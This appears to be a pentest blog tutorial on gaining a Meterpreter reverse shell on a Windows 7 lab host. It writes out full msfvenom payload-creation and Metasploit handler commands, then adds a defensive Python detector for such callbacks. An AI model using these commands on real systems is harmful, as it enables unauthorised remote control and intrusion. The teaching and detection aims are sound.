How to Exploit a Windows 7 Machine Using Metasploit on Kali Linux – A Step‑by‑Step Guide

This article walks through setting up a Kali Linux host, creating a malicious payload, configuring Metasploit’s handler, and successfully gaining a meterpreter session on a Windows 7 target, illustrating core penetration‑testing techniques for educational purposes.

MaGe Linux Operations

Introduction

Kali Linux is a Debian‑based distribution designed for penetration testing and comes with over 300 pre‑installed tools. Metasploit is a framework for developing and executing security exploits, which can be used directly on Kali Linux. This guide shares a personal testing experience in a controlled internal environment and does not encourage illegal activities.

Test Preparation

Two machines are used:

Source machine running Kali Linux (details shown in the image).

Target machine running Windows 7 (details shown in the image).

Exploitation Setup

1. Create a payload

A payload is a program similar to a virus or trojan that runs on the remote target. The following command creates program.exe:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 -f exe -o program.exe

Use ls to verify the payload file was generated, and cat to inspect it.

2. Launch the Metasploit console

Start the console with:

msfconsole

3. Choose the exploit

Set the listening port (e.g., 4444) and the local IP address (LHOST) of the Kali machine, which in this example is 192.168.189.128. You can view the IP with:

ifconfig

In the console, run:

use exploit/multi/handler

Then configure the payload:

set payload windows/meterpreter/reverse_tcp

Set the local address and port:

set LHOST 192.168.189.128
set LPORT 4444

Finally, launch the exploit:

exploit

Successful Exploitation

When program.exe runs on the Windows 7 target, a Meterpreter session is established. Running sysinfo inside the session reveals detailed information about the compromised machine. Further enumeration commands and additional exploits can be used to deepen the intrusion. Use help for a list of available commands.
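On the defender's side, the session described above appears as an outbound TCP connection from the Windows 7 host to the handler's LHOST and LPORT. The following detection logic is an added example, not part of the original article: it assumes connection records in a simplified key=value layout using Sysmon Event ID 3 field names, and the sample events, the user name alice, the file upd.exe and the egress port baseline are all constructed for illustration.

```python
import ipaddress
import re

# Constructed sample records using a simplified key=value layout with
# Sysmon Event ID 3 (network connection) field names; not real telemetry.
SAMPLE_EVENTS = r"""
Image=C:\Program Files\Mozilla Firefox\firefox.exe Initiated=true DestinationIp=93.184.216.34 DestinationPort=443
Image=C:\Users\alice\Downloads\program.exe Initiated=true DestinationIp=192.168.189.128 DestinationPort=4444
Image=C:\Windows\System32\svchost.exe Initiated=false DestinationIp=192.168.189.130 DestinationPort=3389
Image=C:\Users\alice\AppData\Local\Temp\upd.exe Initiated=true DestinationIp=192.168.189.128 DestinationPort=8443
"""

FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")  # values may contain spaces
USER_WRITABLE = ("\\users\\", "\\windows\\temp\\", "\\programdata\\")
EXPECTED_PORTS = {53, 80, 443}  # assumption: egress baseline for this workstation
WATCH_PORTS = {4444}            # LPORT used in the walkthrough above

def parse_event(line):
    """Turn one key=value record into a dict of field name -> value."""
    return dict(FIELD_RE.findall(line.strip()))

def assess(event):
    """Return the reasons a connection resembles a reverse_tcp callback."""
    if event.get("Initiated", "").lower() != "true":
        return []  # inbound connection: not the reverse_tcp pattern
    port = int(event["DestinationPort"])
    image = event["Image"].lower()
    reasons = []
    if any(p in image for p in USER_WRITABLE) and port not in EXPECTED_PORTS:
        reasons.append("user-writable binary on unexpected port %d" % port)
        if ipaddress.ip_address(event["DestinationIp"]).is_private:
            reasons.append("destination is an internal address")
        if port in WATCH_PORTS:
            reasons.append("port matches walkthrough LPORT")
    return reasons

def detect(log_text):
    """Map image path -> reasons for every flagged record."""
    findings = {}
    for line in filter(str.strip, log_text.splitlines()):
        event = parse_event(line)
        reasons = assess(event)
        if reasons:
            findings[event["Image"]] = reasons
    return findings

if __name__ == "__main__":
    for image, reasons in detect(SAMPLE_EVENTS).items():
        print(image, "->", "; ".join(reasons))
```

Because LPORT is chosen by whoever builds the payload, the rule keys on the process path and the unexpected outbound port; the 4444 match only adds a reason to a record that is already flagged.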

Written by

MaGe Linux Operations
